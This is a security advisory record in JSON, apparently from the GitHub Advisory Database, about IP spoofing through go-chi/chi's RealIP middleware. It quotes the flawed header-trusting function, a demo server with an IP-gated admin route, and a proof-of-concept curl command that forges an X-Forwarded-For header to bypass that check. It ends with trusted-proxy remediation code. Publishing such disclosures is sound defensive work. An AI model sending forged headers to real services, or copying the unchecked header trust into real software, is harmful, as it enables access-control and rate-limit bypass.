{"id":"GHSA-rjr7-jggh-pgcp","summary":"chi's RealIP Middleware allows IP spoofing via unvalidated X-Forwarded-For header","details":"### Summary\nrealip middleware in go-chi/chi trusts headers like x-forwarded-for without checking them, so attackers can fake their ip and bypass rate limits or access controls\n\n### Details\n\nthe vuln is in middleware/realip.go , the realIP() function pulls IPs straight from client headers and replaces r.RemoteAddr without checking if the request came from a trusted proxy\n\n```go\nfunc realIP(r *http.Request) string {\n    var ip string\n    if tcip := r.Header.Get(trueClientIP); tcip != \"\" {\n        ip = tcip  // controlled by attacker\n    } else if xrip := r.Header.Get(xRealIP); xrip != \"\" {\n        ip = xrip  // controlled by attacker\n    } else if xff := r.Header.Get(xForwardedFor); xff != \"\" {\n        ip, _, _ = strings.Cut(xff, \",\")  // controlled by attacker\n    }\n    // ...\n    return ip\n}\n```\n\nno trusted proxy cidr check in place, any client can send these headers\n\n### PoC\n\ncreate a server with chi and use realip middleware\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"net/http\"\n    \"github.com/go-chi/chi/v5\"\n    \"github.com/go-chi/chi/v5/middleware\"\n)\n\nfunc main() {\n    r := chi.NewRouter()\n    r.Use(middleware.RealIP)\n\n    r.Get(\"/admin\", func(w http.ResponseWriter, r *http.Request) {\n        // ip-based access control got bypassed\n        if r.RemoteAddr == \"127.0.0.1\" {\n            w.Write([]byte(\"SECRET ADMIN DATA\"))\n            return\n        }\n        http.Error(w, \"Forbidden\", 403)\n    })\n\n    http.ListenAndServe(\":8080\", r)\n}\n```\n\nspoofed the ip to bypass access control\n\n```bash\ncurl -H \"X-Forwarded-For: 127.0.0.1\" http://localhost:8080/admin\n```\n\n\n### Impact\n\n- ip-based access control bypass lets attackers reach restricted endpoints\n- rate limiting bypass lets attackers avoid limits by rotating spoofed ips\n- audit logs show fake ips picked by attacker instead of real ones\n- attackers can get around geo ip restrictions\n\n## Remediation Recommendation\n\nvalidate proxy cidr first before trusting forwarded ip headers\n\n```go\n// add your reverse proxy ip addresses here\nvar trustedProxies = []net.IPNet{\n       {IP: net.ParseIP(\"10.0.0.0\"), Mask: net.CIDRMask(8, 32)},\n    {IP: net.ParseIP(\"172.16.0.0\"), Mask: net.CIDRMask(12, 32)},\n    {IP: net.ParseIP(\"192.168.0.0\"), Mask: net.CIDRMask(16, 32)},\n}\n\nfunc isTrustedProxy(ip net.IP) bool {\n    for _, cidr := range trustedProxies {\n        if cidr.Contains(ip) {\n            return true\n        }\n    }\n    return false\n}\n```","aliases":["CVE-2026-72816","GO-2026-5777"],"modified":"2026-08-15T04:24:28.070639463Z","published":"2026-06-25T18:19:15Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-06-25T18:19:15Z","nvd_published_at":null,"cwe_ids":["CWE-290","CWE-348"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/go-chi/chi/security/advisories/GHSA-rjr7-jggh-pgcp"},{"type":"PACKAGE","url":"https://github.com/go-chi/chi"},{"type":"WEB","url":"https://github.com/go-chi/chi/releases/tag/v5.3.0"}],"affected":[{"package":{"name":"github.com/go-chi/chi/middleware","ecosystem":"Go","purl":"pkg:golang/github.com/go-chi/chi/middleware"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"1.5.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-rjr7-jggh-pgcp/GHSA-rjr7-jggh-pgcp.json"}},{"package":{"name":"github.com/go-chi/chi/v2/middleware","ecosystem":"Go","purl":"pkg:golang/github.com/go-chi/chi/v2/middleware"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"2.1.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-rjr7-jggh-pgcp/GHSA-rjr7-jggh-pgcp.json"}},{"package":{"name":"github.com/go-chi/chi/v3/middleware","ecosystem":"Go","purl":"pkg:golang/github.com/go-chi/chi/v3/middleware"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"3.3.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-rjr7-jggh-pgcp/GHSA-rjr7-jggh-pgcp.json"}},{"package":{"name":"github.com/go-chi/chi/v4/middleware","ecosystem":"Go","purl":"pkg:golang/github.com/go-chi/chi/v4/middleware"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"4.1.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-rjr7-jggh-pgcp/GHSA-rjr7-jggh-pgcp.json"}},{"package":{"name":"github.com/go-chi/chi/v5/middleware","ecosystem":"Go","purl":"pkg:golang/github.com/go-chi/chi/v5/middleware"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"5.3.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-rjr7-jggh-pgcp/GHSA-rjr7-jggh-pgcp.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"}]}